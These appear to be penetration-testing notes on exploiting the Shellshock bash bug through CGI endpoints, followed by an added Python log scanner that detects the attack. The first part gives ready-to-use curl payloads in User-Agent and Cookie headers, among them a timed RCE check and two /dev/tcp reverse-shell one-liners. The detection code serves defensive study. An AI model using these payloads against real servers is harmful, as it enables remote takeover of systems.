feroxbuster -u http://$IP/cgi-bin/ -x sh,cgi,pl


(step 1) - Testing for Shellshock
Most tests are based on echoing a string and checking that the same string comes back in the web response. If you think a page may be vulnerable, enumerate all the CGI pages and test each of them.

nmap $IP -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
(step 2) - PoC that we have RCE (you could also make the target ping or send a web request back to you and watch for it with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://$IP/cgi-bin/test.cgi
(step 3) - Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/ <&1"' http://$IP/cgi-bin/test.cgi



curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://$IP/cgi-bin/test.cgi 2>/dev/null | grep 'VULNERABLE'
Out-Of-Band
Use Cookie as an alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1' http://$IP/cgi-bin/
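Detection counterpart for the header-carried probes above (User-Agent in steps 1 to 3, Cookie in the out-of-band variant), as an added example that is not part of the original notes: a small Python scanner that parses web-server access-log lines and flags any logged header value that starts with a bash function definition, the `() {` token pair every Shellshock payload shares. It assumes the Apache/Nginx "combined" log format, in which the last two quoted fields are Referer and User-Agent; the log lines, addresses and timestamps are constructed. Cookie is not part of the default combined format, so a Cookie-based probe only shows up if the LogFormat or a reverse proxy records that header.

```python
"""Scan access-log lines for Shellshock-style header injection.

Constructed example (not from the original notes). Assumes the
"combined" log format: the last two quoted fields are Referer and
User-Agent. Cookie is not logged by default, so a Cookie-carried probe
is only visible if LogFormat or a proxy records that header.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


def _quoted(name: str) -> str:
    # A quoted log field. Apache escapes embedded quotes as \" so the body
    # must accept backslash-escaped characters, otherwise a payload such as
    # echo "..." would break the parse.
    return r'"(?P<%s>(?:[^"\\]|\\.)*)"' % name


COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    + _quoted("req") + r' (?P<status>\d{3}) (?P<size>\S+) '
    + _quoted("referer") + " " + _quoted("ua") + r"$"
)

# The trigger is an exported bash function definition at the start of the
# header value; "() {", "(){" and "() { :;};" all share this token pair.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


@dataclass
class Finding:
    line_no: int
    src_ip: str
    path: str
    header: str   # which logged header carried the payload
    snippet: str  # truncated payload for the alert


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_payload(value: str) -> bool:
    """True if a header value looks like a bash function-definition probe."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Flag every line whose Referer or User-Agent carries the pattern."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        fields = parse_combined(line)
        if fields is None:
            continue  # unparsable line; a real deployment would count these
        parts = fields["req"].split()
        path = parts[1] if len(parts) >= 2 else ""
        for header in ("referer", "ua"):
            value = fields[header]
            if is_shellshock_payload(value):
                findings.append(
                    Finding(line_no, fields["ip"], path, header, value[:80])
                )
    return findings


def count_by_source(findings: Iterable[Finding]) -> Dict[str, int]:
    """Probes per source address, a convenient pivot for triage."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.src_ip] = counts.get(f.src_ip, 0) + 1
    return counts


# Constructed sample log: one normal visit, two probes against the same CGI
# endpoint, and a benign User-Agent containing "()" to show it is not flagged.
SAMPLE_LOG = r'''
10.0.0.5 - - [24/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
10.0.0.9 - - [24/Sep/2014:10:00:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo \"VULNERABLE TO SHELLSHOCK\""
10.0.0.9 - - [24/Sep/2014:10:00:12 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :; }; /bin/bash -c \"sleep 5\""
10.0.0.12 - - [24/Sep/2014:10:01:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0 () Gecko"
'''.strip().splitlines()


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {h.src_ip} -> {h.path} via {h.header}: {h.snippet!r}")
    print("probes per source:", count_by_source(hits))
```

The `() {` token pair is the same thing a WAF or IDS signature keys on, and it is present in the log whether or not the probe worked: a bash patched against Shellshock ignores the trailing command, so the log still records the attempt and the source address even on a server that was never exploitable.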